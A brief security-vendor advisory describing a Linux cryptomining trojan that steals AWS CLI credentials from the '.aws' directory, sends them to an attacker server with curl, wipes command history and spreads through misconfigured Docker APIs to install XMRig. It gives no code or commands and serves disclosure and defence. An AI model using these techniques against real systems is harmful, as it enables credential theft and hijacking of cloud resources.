AWS credentials stealer: Linux/Coinminer

Researchers in our lab have come across a cryptominer trojan that steals ASW credentials. It also steals other sensitive information from compromised Linux instances. It is also found to be infecting instances that run Dockers.

How it steals AWS credentials?

AWS instances can be controlled using AWS CLI tools. The tools stores credentials and configuration details in the home directory of the user under the hidden directory “.aws/”. the credentials and configuration files stored in this directory are send to attackers server using CURL tool as a HTML form.

It also removes the traces by clearing the commands history in the instance. The remote service that receives the stolen files responds “THX” to indicate successful file transfer.

Worming on Dockers

It also looks for misconfigured Dockers instances using masscan, an open source pentesting tool. It accesses the mis-configured Docker APIs to install itself in inside it.

It installs XMRig, an open source crypto currency mining tool. XMRig is used by the malware to mine monero crypto currency for the attackers. The malware also installs other hacking tools on the compromised machines.

Arctos Networks detects the malware as Linux/Cryptominer.J.

If you find traces of this malware in your instances you can get in touch with our security response unit to fix it.